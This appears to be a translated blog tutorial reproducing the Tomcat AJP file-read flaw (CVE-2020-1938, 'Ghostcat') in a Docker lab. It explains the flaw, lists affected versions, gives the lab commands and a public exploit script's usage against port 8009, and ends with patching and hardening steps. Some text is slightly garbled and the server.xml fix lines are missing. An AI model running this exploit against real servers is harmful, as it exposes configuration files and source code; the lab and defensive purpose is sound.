Sunday, September 8, 2024
HometomcatApache Tomcat file contains vulnerability recurrence (detailed tutorial) (1)

Apache Tomcat file contains vulnerability recurrence (detailed tutorial) (1)

1. Principle of vulnerability

Tomcat server is a free open source web application server. After installation, the ajp connector will be enabled by default to facilitate interaction with other web servers through the ajp protocol. It is a lightweight application server and is commonly used in small and medium-sized systems and situations where there are not many concurrent access users. It is the first choice for developing and debugging JSP programs. Tomcat, like Web servers such as IIS, has the function of processing HTML pages. In addition, it is also a Servlet and JSP container. An independent Servlet container is the default mode of Tomcat. However, Tomcat's ability to handle static HTML is not as good as the Apache server. Tomcat is a project developed by the Apache open source organization to handle HTTP services. Both are free and can be run as independent web servers. Apache Tomcat will open the AJP connector to facilitate interaction with other web servers through the AJP protocol. This vulnerability is caused by a flaw in the Tomcat AJP protocol. An attacker can read any file in the webapp directory by constructing specific parameters.

2. Vulnerability overview and analysis

Tomcat is a project developed by the Apache open source organization to handle HTTP services. Both are free and can be run as independent web servers. The Apache Tomcat server has a file inclusion vulnerability. An attacker can use this vulnerability to read or include any files in all webapp directories on Tomcat, such as webapp configuration files or source code.

AJP Connector

The Apache Tomcat server establishes a connection with the client program through the Connector connector component, which represents the endpoint that receives the request and returns the response. That is, the Connector component is responsible for receiving the customer's request and sending the response result of the Tomcat server to the customer. In the Apache Tomcat server, the 8080 port we usually use the most is the so-called Http Connector, which uses the Http (HTTP/1.1) protocol.

In the conf/server.xml file, its corresponding configuration is

<Connectorport=”8080″protocol=”HTTP/1.1″connectionTimeout=”20000″redirectPort=”8443″ />The AJP Connector uses the AJP protocol (Apache Jserv Protocol), which is a directed packet protocol. For performance reasons, using binary format to transmit readable text can reduce the processing cost of HTTP requests, so it is mainly used in scenarios that require clustering and reverse proxies.

The configuration corresponding to the Ajp protocol is

<Connectorport=”8009″protocol=”AJP/1.3″redirectPort=”8443″ />The Tomcat server opens this port to the external network by default. There are two ways for web clients to access the Tomcat server:

Apache server

(1) AJP is a binary TCP transmission protocol. The browser cannot use AJP. Instead, Apache first communicates with Tomca for AJP, and then Apache performs a reverse proxy through the proxy_ajp module, converts it into an HTTP server and then exposes it to the user, allowing the user to access.

(2) The reason for this is that compared to the HTTP plain text protocol, it has higher efficiency and performance, and a lot of optimizations have also been made. To a certain extent, AJP can be understood as the binary version of HTTP, which is widely used to speed up transmission efficiency. The actual situation is that there are very few servers like Apache that have the proxy_ajp module that can reverse proxy the AJP protocol, so the AJP protocol is rarely used in production environments.

3. Scope of influence

Apache Tomcat 6

Tomcat 7 series <7.0.100

Tomcat 8 series < 8.5.51

Tomcat 9 series <9.0.31

4. Build a weak environment

4.1 Ubuntu

4.2 Update resources update

4.3 Install docker

sudo apt-get update

sudo apt-get install docker

sudo apt-get install docker.io

sudo apt-get install docker-registry

sudo docker version

4.4 Install nmap

apt-get install nmap

4.5 Install Tomcat

docker search Tomcat-8.5.32

docker pull duonghuuphuc/tomcat-8.5.32

4.6 View the pulled Tomcat image

docker images

4.7 Boot Image

Docker run -d -p 8080:8080 -p 8009:8009 –name

ghostcat duonghuuphuc/tomcat-8.5.32

docker port ghostcat

4.8 Check the ip address is 192.168.86.129

ifconfig -a

4.9 If the browser can access the Tomcat page, it means the environment is set up successfully

192.168.86.129:8080

5.Vulnerability Recurrence

5.1

docker exec -it ghostcat /bin/bash

cd webapps/ROOT/

5.2 Add test files

echo ‘this is CVE-2020-1938’>test.txt

ls

cat test.txt

5.3

exp address: https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

git clone https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

5.4

cd CNVD-2020-10487-Tomcat-Ajp-lfi/
ls
chomd +x CNVD-2020-10487-Tomcat-Ajp-lfi.py
ls

5.5 Use exp to read the file

****./****CNVD-2020-10487-Tomcat-Ajp-lfi.py -p 8009 -f test.txt 192.168.86.129

Test read successful

6. Vulnerability repair and defense methods

Apache Tomcat files contain vulnerabilities that need to be fixed in newer versions. Currently, Apache has officially released versions 9.0.31, 8.5.51 and 7.0.100 to fix this vulnerability. If relevant users are temporarily unable to upgrade the version, they can use the following methods according to their own circumstances. Protection measures: If you do not need to use the Tomcat AJP protocol, you can directly close the AJP Connector, or change its listening address to only listen to the localhost of the machine; if you need to use the Tomcat AJP protocol, you can set the authentication credentials according to the version configuration protocol properties. as follows:

  1. Immediately upgrade Tomcat to version 9.0.31, 8.5.51 or 7.0.100 for repair.

  2. Disable or restrict the AJP protocol.

Edit /conf/server.xml and find the following line:

Comment out this line (or delete it):

Configure the secret to set the authentication credentials for the AJP protocol.

For example (note that YOUR_TOMCAT_AJP_SECRET must be changed to a value that is highly secure and cannot be easily guessed):

  1. Configure access control: Properly configuring access control is one of the important measures to prevent vulnerabilities. By configuring appropriate access control policies, you can restrict access to sensitive files and allow only authorized users to perform relevant operations.

  2. Regular monitoring and updates: Regularly monitor vulnerability information and security bulletins, and update relevant software and patches in a timely manner to ensure the security and stability of the system.

  3. Strengthen server security: In addition to taking measures against specific vulnerabilities, the security of the entire server should also be strengthened. For example, use a firewall to restrict access to the server, enable Web Application Firewall (WAF), configure SSL/TLS encrypted transmission, use strong passwords and change passwords regularly, disable unnecessary services, etc.

RELATED ARTICLES

Most Popular

Recent Comments